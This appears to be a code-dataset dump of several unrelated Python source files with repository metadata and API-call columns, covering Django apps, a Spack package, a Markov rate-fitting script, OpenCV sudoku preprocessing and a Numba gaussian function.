repo_name
stringlengths 7
94
| repo_path
stringlengths 4
237
| repo_head_hexsha
stringlengths 40
40
| content
stringlengths 10
680k
| apis
stringlengths 2
840k
|
---|---|---|---|---|
hoover/hoover | hoover/site/wsgi.py | 84053b2479e966b0f639692c9e226261e3188709 | from . import events # noqa
from django.core.wsgi import get_wsgi_application
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hoover.site.settings")
application = get_wsgi_application()
| [((4, 0, 4, 71), 'os.environ.setdefault', 'os.environ.setdefault', ({(4, 22, 4, 46): '"""DJANGO_SETTINGS_MODULE"""', (4, 48, 4, 70): '"""hoover.site.settings"""'}, {}), "('DJANGO_SETTINGS_MODULE', 'hoover.site.settings')", False, 'import os\n'), ((7, 14, 7, 36), 'django.core.wsgi.get_wsgi_application', 'get_wsgi_application', ({}, {}), '()', False, 'from django.core.wsgi import get_wsgi_application\n')] |
pbasting/cactus | submodules/hal/analysis/constraintTurnover/turnoverModel.py | 833d8ca015deecdfa5d0aca01211632cdaca9e58 | #!/usr/bin/env python
#Copyright (C) 2013 by Glenn Hickey
#
#Released under the MIT license, see LICENSE.txt
#!/usr/bin/env python
"""This is a two-state continuous time markov model: 0: unconstratined. 1: constrained. There are two transition rates to go between states. lossRate: 1->0 and gainRate: 0->1. Probability Matrix and Stationary Distribution are computed from the two rates and a time t. (see pdf)
"""
import argparse
import os
import sys
import copy
import random
import math
from collections import defaultdict
import numpy as np
import subprocess
import tempfile
#constrained is always 1. unconstrained is always 0
# compute probability matrix from rates and time.
def computePMatrix(lossRate, gainRate, t):
assert t >= 0
assert lossRate >= 0
assert gainRate >= 0
x = gainRate / lossRate
y = gainRate + lossRate
eyt = math.exp(-y * t)
c = 1.0 / (x + 1.0)
P = [ [c * (1.0 + x * eyt), c * (x - x * eyt)],
[c * (1.0 - eyt), c * (x + eyt)] ]
assert math.fabs(P[0][0] + P[0][1] - 1.0) < 0.00001
assert math.fabs(P[1][0] + P[1][1] - 1.0) < 0.00001
return P
# compute stationary distribution from rates and time
def computeStationaryDist(lossRate, gainRate, t):
assert t >= 0
assert lossRate >= 0
assert gainRate >= 0
x = gainRate / lossRate
y = gainRate + lossRate
eyt = math.exp(-y * t)
pi0 = (eyt - 1.0) / ( x * eyt + eyt - x - 1.0)
pi1 = 1. - pi0
# assert pi0 * ( ((1.0 + x * eyt) / (x + 1.0)) -1.0) + (1.0 - pi0) * ((1.0 - eyt) / (x + 1.0)) == 0
assert pi0 >= 0 and pi0 <= 1.0
assert pi1 >= 0 and pi1 <= 1.0
return [pi0, pi1]
# compute the absolute difference between the values of the
# probability matrix and stationary distribution computed from a given
# rate, and a set of absolute values of the same. This is a sum of four
# differences, 2 for the distribution, 4 for the matrix.
def diffOnePoint(lossRate, gainRate, piEst, Pest, t):
P = computePMatrix(lossRate, gainRate, t)
pi = computeStationaryDist(lossRate, gainRate, t)
d = math.fabs(pi[0] - piEst[0])
d += math.fabs(pi[1] - piEst[1])
d += math.fabs(P[0][0] - Pest[0][0])
d += math.fabs(P[0][1] - Pest[0][1])
d += math.fabs(P[1][0] - Pest[1][0])
d += math.fabs(P[1][1] - Pest[1][1])
return d
# compute the sum of squared differences for a pair of rate parameters
# and a set of data points. Each data point is a 3 tuple:
# (1x2 stationary distribution pi, 2x2 probability matrix P, time t)
def diffSqManyPoints(lossRate, gainRate, estVals):
dtot = 0
for estVal in estVals:
piEst = estVal[0]
Pest = estVal[1]
t = estVal[2]
d = diffOnePoint(lossRate, gainRate, piEst, Pest, t)
dtot += d * d
return dtot
# use really simple gradient descent type approach to find rate values that
# minimize the squared difference with some data points. Each data point
# is a 3-tuple as described above. The gradient descent iteratres over
# maxIt iterations. Each iteration it tries to add and subtract delta from
# the current best rates (4 combinations: add delta to gain, add delta to loss,
# subtract delta from gain, subtract delta from loss). The best pair
# of rate parameters are returned, along with their square difference from
# the data.
def gradDescent(lrStart, grStart, estVals, maxIt, delta):
bestDiff = diffSqManyPoints(lrStart, grStart, estVals)
bestLr = lrStart
bestGr = grStart
lastChangeIterator = 0
for i in range(maxIt):
lr = bestLr
gr = bestGr
dpl = diffSqManyPoints(lr + delta, gr, estVals)
rval = random.randint(0, 3)
if rval == 0 and dpl < bestDiff:
bestDiff = dpl
bestLr = lr + delta
bestGr = gr
lastChangeIterator = i
dpg = diffSqManyPoints(lr, gr + delta, estVals)
if rval == 1 and dpg < bestDiff:
bestDiff = dpg
bestLr = lr
bestGr = gr + delta
lastChangeIterator = i
if rval == 2 and lr > delta:
dml = diffSqManyPoints(lr - delta, gr, estVals)
if dml < bestDiff:
bestDiff = dml
bestLr = lr - delta
bestGr = gr
lastChangeIterator = i
if rval == 3 and gr > delta:
dmg = diffSqManyPoints(lr, gr - delta, estVals)
if dmg < bestDiff:
bestDiff = dmg
bestLr = lr
bestGr = gr - delta
lastChangeIterator = i
#
# Hack: if nothing happened, instead of returning, try adding
# 10x the step value and seeing what happens.
#
if i == lastChangeIterator + 8:
boostDelta = delta * 10.
dpl = diffSqManyPoints(lr + boostDelta, gr, estVals)
if rval == 0 and dpl < bestDiff:
bestDiff = dpl
bestLr = lr + boostDelta
bestGr = gr
lastChangeIterator = i
dpg = diffSqManyPoints(lr, gr + boostDelta, estVals)
if rval == 1 and dpg < bestDiff:
bestDiff = dpg
bestLr = lr
bestGr = gr + boostDelta
lastChangeIterator = i
if rval == 2 and lr > boostDelta:
dml = diffSqManyPoints(lr - boostDelta, gr, estVals)
if dml < bestDiff:
bestDiff = dml
bestLr = lr - boostDelta
bestGr = gr
lastChangeIterator = i
if rval == 3 and gr > boostDelta:
dmg = diffSqManyPoints(lr, gr - boostDelta, estVals)
if dmg < bestDiff:
bestDiff = dmg
bestLr = lr
bestGr = gr - boostDelta
lastChangeIterator = i
# we tried the 10x and now give up
elif i > lastChangeIterator + 8:
break
return (bestLr, bestGr, bestDiff)
# add some noise to parameters
def addNoise(P, pi, maxNoise):
d = random.uniform(-maxNoise, maxNoise)
P[0][0] += d
P[0][1] -= d
d = random.uniform(-maxNoise, maxNoise)
P[1][0] += d
P[1][1] -= d
d = random.uniform(-maxNoise, maxNoise)
pi[0] += d
pi[1] -= d
# generate some random "estimated" parameters for values of t
# within a given range. random noise is added as specifed by maxNoise
def generateData(n, tRange, lossRate, gainRate, maxNoise):
genVals = []
for i in range(n):
t = random.uniform(tRange[0], tRange[1])
P = computePMatrix(lossRate, gainRate, t)
pi = computeStationaryDist(lossRate, gainRate, t)
addNoise(P, pi, maxNoise)
genVals.append((pi, P, t))
return genVals
def main(argv=None):
if argv is None:
argv = sys.argv
parser = argparse.ArgumentParser()
parser.add_argument("N", type=int,
help="number of simulated data sets")
parser.add_argument("size", type=int,
help="number of simulated data points per set")
parser.add_argument("minRate", type=float,
help="minimum true rate")
parser.add_argument("maxRate", type=float,
help="maximum true rate")
parser.add_argument("minT", type=float,
help="minimum true t")
parser.add_argument("maxT", type=float,
help="maximum true t")
parser.add_argument("--maxIt", type=int, default=1000,
help="number of iterations for gradient descent")
parser.add_argument("--step", type=float, default=0.001,
help="gradient descent step")
parser.add_argument("--noise", type=float, default=0,
help="max amount of noise to add")
parser.add_argument("--retries", type=int, default=5,
help="number of gradient descents to run")
args = parser.parse_args()
assert (args.N > 0 and args.size > 0 and args.minRate > 0 and
args.maxRate > 0 and args.minT > 0 and args.maxT > 0 and
args.maxIt > 0 and args.step > 0 and args.noise >= 0 and
args.retries > 1)
for n in range(args.N):
lrTrue = random.uniform(args.minRate, args.maxRate)
grTrue = random.uniform(args.minRate, args.maxRate)
genVals = generateData(args.size, (args.minT, args.maxT),
lrTrue, grTrue, args.noise)
bestLr, bestGr, bestDiff = (0, 0, 1000000)
for retry in range(args.retries):
lrStart = random.uniform(0.0001, 1.0)
grStart = random.uniform(0.0001, 1.0)
(lrEst, grEst, diff) = gradDescent(lrStart, grStart, genVals,
args.maxIt, args.step)
if diff < bestDiff:
bestLr, bestGr, bestDiff = (lrEst, grEst, diff)
print "Truth=(%f,%f), Start=(%f,%f) Est=(%f,%f), dsq=%f" % (
lrTrue, grTrue, lrStart, grStart, bestLr, bestGr,
(lrTrue - bestLr) * (lrTrue - bestLr) +
(grTrue - bestGr) * (grTrue - bestGr))
print "--------------------------------"
if __name__ == "__main__":
sys.exit(main())
| [] |
speratus/SimpleBudget | SimpleBudget/SimpleBudget/budgets/tests.py | d4903db8693694572c4bcb367fe4a318a3867d68 | from django.test import TestCase
from .validators import validate_budget_period
from .models import Budget, Expense, Payment
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
class ExpenseTestCases(TestCase):
def setUp(self) -> None:
user = User.objects.create_user('joe', email='[email protected]', password='imlame')
budget = Budget.objects.create(name='My budget',
creation_date='2019-05-03',
owner=user,
description='The budget of champions.'
)
Expense.objects.create(name='Water park visit',
amount=30.00,
period='1-monthly',
payee='Super awesome Water parks',
description='I will go to the water park.',
date='2019-06-04',
budget=budget
)
Payment.objects.create(name='Paycheck',
amount=4000.0,
period='1-monthly',
description='Where the Mullah comes from',
date='2017-01-12',
origin='The big boss fom up top in HR.',
budget=budget
)
def test_proper_str_formation(self):
budget = Budget.objects.get(pk=1)
expense = Expense.objects.get(pk=1)
payment = Payment.objects.get(pk=1)
self.assertEquals(budget.__str__(), 'My budget: joe', 'The budget was not created properly.')
self.assertEquals(expense.__str__(), 'Water park visit: 30.0', 'The expense was not create properly.')
self.assertEquals(payment.__str__(), 'Paycheck: 4000.0', 'The string function on payment is not workng properly.')
class BudgetPeriodValidatorTestCase(TestCase):
valid_cases = [
'1-daily',
'1-onetime',
'1-annually',
'5-quarterly',
'7-weekly',
'3-annually',
'10-monthly',
'19-weekly',
'99-daily'
]
invalid_cases = [
'0.4-daily',
'0-weekly',
'ad-annually',
'100-weekly',
'4.6-quarterly',
'-31-daily',
'whoot-quarterly',
'59-zoobly',
'5-onetime',
'03-monthly',
]
def test_budget_period_validator(self):
for c in self.valid_cases:
self.assertEquals(validate_budget_period(c), None, f'failed on {c}')
def test_budget_period_validator_fail(self):
for c in self.invalid_cases:
self.assertRaises(ValidationError, validate_budget_period, c)
def test_validator_in_expense_model_creation_invalid(self):
user = User.objects.create(username='joe', email='[email protected]', password='imlame')
budget = Budget.objects.create(name='My Budget',
creation_date='2019-04-13',
owner=user,
)
for c in self.invalid_cases:
self.assertRaises(Exception, Expense.objects.create,
name=c + '1',
amount=15.0,
date='2014-05-06',
period=c,
budget=budget
)
| [((11, 15, 11, 95), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', (), '', False, 'from django.contrib.auth.models import User\n'), ((78, 15, 78, 97), 'django.contrib.auth.models.User.objects.create', 'User.objects.create', (), '', False, 'from django.contrib.auth.models import User\n')] |
kubapi/hater | feed/migrations/0002_remove_player_finished_decks.py | fe4ef653e169143b9ea8cc17494e8e35b2a7bc76 | # Generated by Django 3.2.3 on 2021-06-13 19:58
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('feed', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='player',
name='finished_decks',
),
]
| [((13, 8, 16, 9), 'django.db.migrations.RemoveField', 'migrations.RemoveField', (), '', False, 'from django.db import migrations\n')] |
jeanbez/spack | var/spack/repos/builtin/packages/abacus/package.py | f4e51ce8f366c85bf5aa0eafe078677b42dae1ba | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
from spack.package import *
class Abacus(MakefilePackage):
"""ABACUS (Atomic-orbital Based Ab-initio Computation at UStc)
is an open-source computer code package aiming
for large-scale electronic-structure simulations
from first principles"""
maintainers = ["bitllion"]
homepage = "http://abacus.ustc.edu.cn/"
git = "https://github.com/abacusmodeling/abacus-develop.git"
url = "https://github.com/abacusmodeling/abacus-develop/archive/refs/tags/v2.2.1.tar.gz"
version("develop", branch="develop")
version(
"2.2.3",
sha256="88dbf6a3bdd907df3e097637ec8e51fde13e2f5e0b44f3667443195481320edf",
)
version(
"2.2.2",
sha256="4a7cf2ec6e43dd5c53d5f877a941367074f4714d93c1977a719782957916169e",
)
version(
"2.2.1",
sha256="14feca1d8d1ce025d3f263b85ebfbebc1a1efff704b6490e95b07603c55c1d63",
)
version(
"2.2.0",
sha256="09d4a2508d903121d29813a85791eeb3a905acbe1c5664b8a88903f8eda64b8f",
)
variant("openmp", default=True, description="Enable OpenMP support")
depends_on("elpa+openmp", when="+openmp")
depends_on("elpa~openmp", when="~openmp")
depends_on("cereal")
depends_on("libxc")
depends_on("fftw")
# MPI is a necessary dependency
depends_on("mpi", type=("build", "link", "run"))
depends_on("mkl")
build_directory = "source"
def edit(self, spec, prefix):
if "+openmp" in spec:
inc_var = "_openmp-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa_openmp -Wl, -rpath=${ELPA_LIB_DIR}"
)
else:
inc_var = "-"
system_var = (
"ELPA_LIB = -L${ELPA_LIB_DIR} -lelpa -Wl,-rpath=${ELPA_LIB_DIR}"
)
tempInc = (
"\
FORTRAN = ifort\n\
CPLUSPLUS = icpc\n\
CPLUSPLUS_MPI = mpiicpc\n\
LAPACK_DIR = $(MKLROOT)\n\
FFTW_DIR = %s\n\
ELPA_DIR = %s\n\
ELPA_INCLUDE = -I${ELPA_DIR}/include/elpa%s%s\n\
CEREAL_DIR = %s\n\
OBJ_DIR = obj\n\
OBJ_DIR_serial = obj\n\
NP = 14\n"
% (
spec["fftw"].prefix,
spec["elpa"].prefix,
inc_var,
"{0}".format(spec["elpa"].version),
spec["cereal"].prefix,
)
)
with open(self.build_directory + "/Makefile.vars", "w") as f:
f.write(tempInc)
lineList = []
Pattern1 = re.compile("^ELPA_INCLUDE_DIR")
Pattern2 = re.compile("^ELPA_LIB\\s*= ")
with open(self.build_directory + "/Makefile.system", "r") as f:
while True:
line = f.readline()
if not line:
break
elif Pattern1.search(line):
pass
elif Pattern2.search(line):
pass
else:
lineList.append(line)
with open(self.build_directory + "/Makefile.system", "w") as f:
for i in lineList:
f.write(i)
with open(self.build_directory + "/Makefile.system", "a") as f:
f.write(system_var)
def install(self, spec, prefix):
install_tree("bin", prefix.bin)
| [((94, 19, 94, 50), 're.compile', 're.compile', ({(94, 30, 94, 49): '"""^ELPA_INCLUDE_DIR"""'}, {}), "('^ELPA_INCLUDE_DIR')", False, 'import re\n'), ((95, 19, 95, 48), 're.compile', 're.compile', ({(95, 30, 95, 47): '"""^ELPA_LIB\\\\s*= """'}, {}), "('^ELPA_LIB\\\\s*= ')", False, 'import re\n')] |
ppelleti/berp | test/regression/features/arithmetic/mult.py | 30925288376a6464695341445688be64ac6b2600 | print(18 * 1234)
print(18 * 1234 * 2)
print(0 * 1)
print(1 * 0)
print(0.0 * 1.0)
print(1.0 * 0.0)
| [] |
SafonovMikhail/python_000577 | 001146StepikPyBegin/Stepik001146PyBeginсh02p05st15C09_20200411.py | 739f764e80f1ca354386f00b8e9db1df8c96531d | num = int(input())
d1 = (num % 10 ** 4) // 10 ** 3
d2 = (num % 10 ** 3) // 10 ** 2
d3 = (num % 10 ** 2) // 10
d4 = num % 10
print("Цифра в позиции тысяч равна", d1)
print("Цифра в позиции сотен равна", d2)
print("Цифра в позиции десятков равна", d3)
print("Цифра в позиции единиц равна", d4)
# print("Python", , "is the best")
_quit = 1
print(_quit * 2)
| [] |
on-merrit/ON-MERRIT | WP3/Task3.2/spark/shared/addcountry2dataset.py | a21324a54a6365f2f769b5952b0cf5347a97d480 | import csv
from os import listdir
from os.path import isfile, join
from osgeo import ogr
from multiprocessing import Pool
driver = ogr.GetDriverByName('GeoJSON')
countryFile = driver.Open("../data/external/countries.json")
layer = countryFile.GetLayer()
class Point(object):
""" Wrapper for ogr point """
def __init__(self, lat, lng):
""" Coordinates are in degrees """
self.point = ogr.Geometry(ogr.wkbPoint)
self.point.AddPoint(lng, lat)
def getOgr(self):
return self.point
ogr = property(getOgr)
class Country(object):
""" Wrapper for ogr country shape. Not meant to be instantiated directly. """
def __init__(self, shape):
self.shape = shape
def getIso(self):
return self.shape.GetField('ISO_A3')
iso = property(getIso)
def __str__(self):
return self.shape.GetField('ADMIN')
def contains(self, point):
return self.shape.geometry().Contains(point.ogr)
def getCountry(lat, lng):
"""
Checks given gps-incoming coordinates for country.
Output is either country shape index or None
"""
point = ogr.Geometry(ogr.wkbPoint)
point.AddPoint(lng, lat)
for i in range(layer.GetFeatureCount()):
country = layer.GetFeature(i)
if country.geometry().Contains(point):
return Country(country).iso
# nothing found
return None
def process_chunk(file):
with open(file, 'r') as read_obj, open(f"{file}_done.csv", 'w') as write_obj:
# pass the file object to reader() to get the reader object
csv_reader = csv.reader(read_obj)
csv_writer = csv.writer(write_obj)
# Iterate over each row in the csv using reader object
count=0
for row in csv_reader:
# row variable is a list that represents a row in csv
if row[2] and row[3]:
country = getCountry(float(row[2]), float(row[3]))
row.append(country)
csv_writer.writerow(row)
count+=1
if count%100==0:
print(f"File {file} progress: {count}/100000")
print(f"Processing {file} terminated")
allfiles = [join("q1a_latlon_split", f) for f in listdir("q1a_latlon_split") if isfile(join("q1a_latlon_split", f))]
with Pool(32) as p:
p.map(process_chunk, allfiles)
| [((82, 12, 82, 39), 'os.path.join', 'join', ({(82, 17, 82, 35): '"""q1a_latlon_split"""', (82, 37, 82, 38): 'f'}, {}), "('q1a_latlon_split', f)", False, 'from os.path import isfile, join\n'), ((84, 5, 84, 13), 'multiprocessing.Pool', 'Pool', ({(84, 10, 84, 12): '(32)'}, {}), '(32)', False, 'from multiprocessing import Pool\n'), ((65, 21, 65, 41), 'csv.reader', 'csv.reader', ({(65, 32, 65, 40): 'read_obj'}, {}), '(read_obj)', False, 'import csv\n'), ((66, 21, 66, 42), 'csv.writer', 'csv.writer', ({(66, 32, 66, 41): 'write_obj'}, {}), '(write_obj)', False, 'import csv\n'), ((82, 49, 82, 76), 'os.listdir', 'listdir', ({(82, 57, 82, 75): '"""q1a_latlon_split"""'}, {}), "('q1a_latlon_split')", False, 'from os import listdir\n'), ((82, 87, 82, 114), 'os.path.join', 'join', ({(82, 92, 82, 110): '"""q1a_latlon_split"""', (82, 112, 82, 113): 'f'}, {}), "('q1a_latlon_split', f)", False, 'from os.path import isfile, join\n')] |
Henchel-Santillan/open-ai | ai-experiments/sudoku/rdisplay.py | 545bf8468330dce7e705c17e0ac4ce3889f20d5b | import cv2
import numpy as np
def process_core(image):
'''
Returns an inverted preprocessed binary image, with noise
reduction achieved with greyscaling, Gaussian Blur, Otsu's Threshold, and
an open morph.
'''
#apply greyscaling, Gaussian Blur, and Otsu's Threshold
greyscale = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(greyscale, (3, 3), 0)
threshold = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)[1]
#apply an open morph to invert image to remove noise
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 3))
invert = 255 - cv2.morphologyEx(threshold, cv2.MORPH_OPEN, kernel, iterations=1)
return invert
def find_houghlines(image, width, height):
hough_lines = None
lines = cv2.HoughLinesP(image, 1, np.pi/180, 50, minLineLength=50, maxLineGap=5)
#generates blank black image with single color layer
if lines is not None and len(lines) != 0:
hough_lines = np.zeros((height, width), dtype=np.uint8)
for line in lines:
x1, y1, x2, y2 = line[0]
cv2.line(hough_lines, (x1, y1), (x2, y2), (255, 255, 255), 2)
return hough_lines
def find_bounds(image):
rect_bounds = None
#Run contour recognition
contours, _ = cv2.findContours(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
#Take list of sorted contours by largest area to smallest area
#If at least one contour is identified, can process visual approx. of contour bounds
if len(sorted(contours, key=cv2.contourArea, reverse=True)) > 0:
contour_bounds = None
#Pre-determined image size factor constant
SFACTOR = 20
for contour in contours:
#Minimum intended size of a single cell is not reached, likely a cutoff, not worth approx.
if (image[0] * image[1]) / SFACTOR > cv2.contourArea(contour):
break
approximation = cv2.approxPolyDP(contour, cv2.arcLength(contour, True), True)
#This means that the approximated polygon is a quad
if len(approximation) == 4:
contour_bounds = approximation
break
if contour_bounds is not None:
rect_bounds = np.zeros((4, 2), dtype=np.float32)
corners = contour_bounds.reshape(-1, 2)
rect_bounds[0] = corners[np.argmin(contour_bounds.sum(axis=1))]
rect_bounds[2] = corners[np.argmax(contour_bounds.sum(axis=1))]
rect_bounds[1] = corners[np.argmin(np.diff(corners, axis=1))]
rect_bounds[3] = corners[np.argmax(np.diff(corners, axis=1))]
return rect_bounds
#Transform the perspective to render as if looking down on paper (top-down view)
def transform(image, perspective):
pass
#Process the grid based on expected clean binary image input
def process_grid(image, width, height):
grid = None
detected = False
hough_lines = find_houghlines(image, width, height)
| [((11, 16, 11, 55), 'cv2.cvtColor', 'cv2.cvtColor', ({(11, 29, 11, 34): 'image', (11, 36, 11, 54): 'cv2.COLOR_BGR2GRAY'}, {}), '(image, cv2.COLOR_BGR2GRAY)', False, 'import cv2\n'), ((12, 11, 12, 49), 'cv2.GaussianBlur', 'cv2.GaussianBlur', ({(12, 28, 12, 37): 'greyscale', (12, 39, 12, 45): '(3, 3)', (12, 47, 12, 48): '0'}, {}), '(greyscale, (3, 3), 0)', False, 'import cv2\n'), ((16, 13, 16, 62), 'cv2.getStructuringElement', 'cv2.getStructuringElement', ({(16, 39, 16, 53): 'cv2.MORPH_RECT', (16, 55, 16, 61): '(3, 3)'}, {}), '(cv2.MORPH_RECT, (3, 3))', False, 'import cv2\n'), ((24, 12, 24, 84), 'cv2.HoughLinesP', 'cv2.HoughLinesP', (), '', False, 'import cv2\n'), ((40, 18, 40, 85), 'cv2.findContours', 'cv2.findContours', ({(40, 35, 40, 40): 'image', (40, 42, 40, 59): 'cv2.RETR_EXTERNAL', (40, 61, 40, 84): 'cv2.CHAIN_APPROX_SIMPLE'}, {}), '(image, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)', False, 'import cv2\n'), ((13, 16, 13, 84), 'cv2.threshold', 'cv2.threshold', ({(13, 30, 13, 34): 'blur', (13, 36, 13, 37): '(0)', (13, 39, 13, 42): '(255)', (13, 44, 13, 83): '(cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)'}, {}), '(blur, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)', False, 'import cv2\n'), ((17, 19, 17, 84), 'cv2.morphologyEx', 'cv2.morphologyEx', (), '', False, 'import cv2\n'), ((28, 22, 28, 63), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((32, 12, 32, 73), 'cv2.line', 'cv2.line', ({(32, 21, 32, 32): 'hough_lines', (32, 34, 32, 42): '(x1, y1)', (32, 44, 32, 52): '(x2, y2)', (32, 54, 32, 69): '(255, 255, 255)', (32, 71, 32, 72): '(2)'}, {}), '(hough_lines, (x1, y1), (x2, y2), (255, 255, 255), 2)', False, 'import cv2\n'), ((62, 26, 62, 60), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((51, 49, 51, 73), 'cv2.contourArea', 'cv2.contourArea', ({(51, 65, 51, 72): 'contour'}, {}), '(contour)', False, 'import cv2\n'), ((54, 54, 54, 82), 'cv2.arcLength', 'cv2.arcLength', ({(54, 68, 54, 75): 'contour', (54, 77, 54, 81): 'True'}, {}), '(contour, True)', False, 'import cv2\n'), ((68, 47, 68, 71), 'numpy.diff', 'np.diff', (), '', True, 'import numpy as np\n'), ((69, 47, 69, 71), 'numpy.diff', 'np.diff', (), '', True, 'import numpy as np\n')] |
abhiskk/pythia | pythia/tasks/base_task.py | c33fb45d74353c25b6269b44551bcafefecb5c7e | # Copyright (c) Facebook, Inc. and its affiliates.
"""
Tasks come above datasets in hierarchy level. In case you want to
implement a new task, you need to inherit ``BaseTask`` class. You need
to implement ``_get_available_datasets`` and ``_preprocess_item`` functions
to complete the implementation. You can check the source to see if you need
to override any other methods like ``prepare_batch``.
Check example of ``VQATask`` here_.
Example::
from pythia.tasks.base_task import BaseTask
from pythia.common.registry import registry
@registry.register_task("my")
class MyTask(BaseTask):
def __init__(self):
super().__init__("my")
def _get_available_datasets(self):
return ["my"]
def _preprocess_item(self):
item.text = None
return item
.. _here: https://github.com/facebookresearch/pythia/blob/v0.3/pythia/tasks/vqa/vqa_task.py
"""
import sys
import numpy as np
from torch.utils.data import Dataset
from pythia.common.registry import registry
class BaseTask(Dataset):
"""
BaseTask that task classes need to inherit in order to create a new task.
Users must implement ``_get_available_datasets`` and ``_preprocess_item``
in order to complete implementation.
Args:
task_name (str): Name of the task with which it will be registered
"""
def __init__(self, task_name):
super(BaseTask, self).__init__()
self.task_name = task_name
self.writer = registry.get("writer")
def _process_datasets(self):
if "datasets" not in self.opts:
self.writer.write(
"No datasets attribute present for task: %s."
" Defaulting to all" % (self.task_name),
"warning",
)
datasets = "all"
else:
datasets = self.opts["datasets"]
if datasets is None or datasets == "all":
datasets = self._get_available_datasets()
if type(datasets) == str:
datasets = list(map(lambda x: x.strip(), datasets.split(",")))
if len(datasets) == 0 and datasets[0] == "all":
datasets = self._get_available_datasets()
self.given_datasets = datasets
def load(self, **opts):
self.opts = opts
self._process_datasets()
self.datasets = []
self.builders = []
available_datasets = self._get_available_datasets()
self.total_length = 0
self.per_dataset_lengths = []
self.num_datasets = 0
for dataset in self.given_datasets:
if dataset in available_datasets:
builder_class = registry.get_builder_class(dataset)
if builder_class is None:
print("No builder class found for %s." % dataset)
continue
builder_instance = builder_class()
if dataset in self.opts["dataset_attributes"]:
attributes = self.opts["dataset_attributes"][dataset]
else:
self.writer.write(
"Dataset %s is missing from "
"dataset_attributes in config." % dataset,
"error",
)
sys.exit(1)
dataset_type = self.opts.get("dataset_type", "train")
builder_instance.build(dataset_type, attributes)
dataset_instance = builder_instance.load(dataset_type, attributes)
self.builders.append(builder_instance)
self.datasets.append(dataset_instance)
self.per_dataset_lengths.append(len(dataset_instance))
self.total_length += len(dataset_instance)
else:
print(
"Dataset %s is not a valid dataset for task %s. Skipping"
% (dataset, self.task_name)
)
self.num_datasets = len(self.datasets)
self.dataset_probablities = [1 for _ in range(self.num_datasets)]
sampling = self.opts.get("dataset_size_proportional_sampling", None)
if sampling is True:
self.dataset_probablities = self.per_dataset_lengths[:]
self.dataset_probablities = [
prob / self.total_length for prob in self.dataset_probablities
]
self.change_dataset()
def _get_available_datasets(self):
"""Set available datasets for this task here.
Override in your child task class
Temporary solution, later we will use decorators to easily register
datasets with a task
Returns:
List - List of available datasets for this particular task
"""
return []
def get_datasets(self):
return self.datasets
def __len__(self):
return self.total_length
def __getitem__(self, idx):
idx = idx % self.per_dataset_lengths[self.dataset_choice]
item = self.chosen_dataset[idx]
return self._preprocess_item(item)
def change_dataset(self):
self.dataset_choice = np.random.choice(
self.num_datasets, 1, p=self.dataset_probablities
)[0]
self.chosen_dataset = self.datasets[self.dataset_choice]
def verbose_dump(self, *args, **kwargs):
self.chosen_dataset.verbose_dump(*args, **kwargs)
def prepare_batch(self, batch):
return self.chosen_dataset.prepare_batch(batch)
def _preprocess_item(self, item):
"""Preprocess an item to be returned from __getitem__.
Override in your child task class, so you have control on what you are
returning
Args:
item (Sample): Sample returned by a particular dataset
Returns:
Sample: Preprocessed item
"""
raise NotImplementedError(
"This task doesn't implement preprocess_item" " method"
)
def update_registry_for_model(self, config):
"""
Use this if there is some specific configuration required by model
which must be inferred at runtime.
"""
for builder in self.builders:
builder.update_registry_for_model(config)
def init_args(self, parser):
parser.add_argument_group("General Task Arguments")
parser.add_argument(
"-dsp",
"--dataset_size_proportional_sampling",
type=bool,
default=0,
help="Pass if you want to sample from"
" dataset according to its size. Default: Equal "
" weighted sampling",
)
# TODO: Figure out later if we want to init args from datasets
# self._init_args(parser)
def _init_args(self, parser):
"""Override this function to add extra parameters to
parser in your child task class.
Parameters
----------
parser : ArgumentParser
Original parser object passed from the higher level classes like
trainer
Returns
-------
type
Description of returned object.
"""
for builder in self.builders:
builder.init_args(parser)
def clean_config(self, config):
"""
Override this in case you want to clean the config you updated earlier
in update_registry_for_model
"""
return config
| [((53, 22, 53, 44), 'pythia.common.registry.registry.get', 'registry.get', ({(53, 35, 53, 43): '"""writer"""'}, {}), "('writer')", False, 'from pythia.common.registry import registry\n'), ((159, 30, 161, 9), 'numpy.random.choice', 'np.random.choice', (), '', True, 'import numpy as np\n'), ((91, 32, 91, 67), 'pythia.common.registry.registry.get_builder_class', 'registry.get_builder_class', ({(91, 59, 91, 66): 'dataset'}, {}), '(dataset)', False, 'from pythia.common.registry import registry\n'), ((106, 20, 106, 31), 'sys.exit', 'sys.exit', ({(106, 29, 106, 30): '(1)'}, {}), '(1)', False, 'import sys\n')] |
Konstantysz/InterGen | src/gauss_n.py | 1a1d0bde165f864daea70c6339a9b8426343fdd9 | from numba import jit
import numpy as np
@jit(nopython=True, parallel=True)
def gauss_n(X, Y, mu_x = 0.0, mu_y = 0.0, amp = 1.0, sigma = 3.0):
'''
Function that generates 2D discrete gaussian distribution.
Boosted with Numba: works in C and with parallel computing.
Parameters
----------
X : numpy.ndarray
meshgrided values in X axis
Y : numpy.ndarray
meshgrided values in Y axis
mu_x : float
Displacement in X axis
mu_y : float
Displacement in Y axis
amp : float
Amplitude of gaussian distribution
sigma : float
Std dev of gaussian distribution
Returns:
----------
val : numpy.ndarray
matrix of 2D gaussian distribution
'''
exponent = ((X - mu_x)**2 + (Y - mu_y)**2) / 2*sigma
val = (amp*np.exp(-exponent))
